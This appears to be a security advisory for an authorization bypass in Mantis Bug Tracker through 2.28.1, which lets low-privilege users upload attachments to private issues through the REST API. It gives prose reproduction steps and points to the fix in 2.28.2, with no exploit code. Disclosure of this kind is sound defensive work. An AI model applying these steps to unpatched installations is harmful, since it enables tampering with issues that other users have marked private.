Mantis Bug Tracker Authorization Bypass Vulnerability Allowing Attachment Uploads to Private Issues

An authorization bypass vulnerability has been identified in Mantis Bug Tracker (MantisBT) versions through 2.28.1. This vulnerability allows authenticated users to upload attachments to private issues they are not authorized to access. The issue arises from the application's permission model, which for existing issues, only checks project-level upload rights rather than issue-specific visibility. Consequently, users can upload files to private issues if they have the necessary project permissions, even if they are barred from viewing those issues.

Impact

Exploitation of this vulnerability could lead to unauthorized access to private issue content through uploaded attachments.

Reproduction

To reproduce this vulnerability, log in as a user with low privileges, such as a reporter. Create a private issue or select an existing one. Verify that access to the issue is denied. Then, send a REST API request to upload an attachment to the private issue, using the appropriate headers and session cookies to authenticate the request.

Remediation

Users can upgrade to MantisBT version 2.28.2, where this vulnerability has been fixed.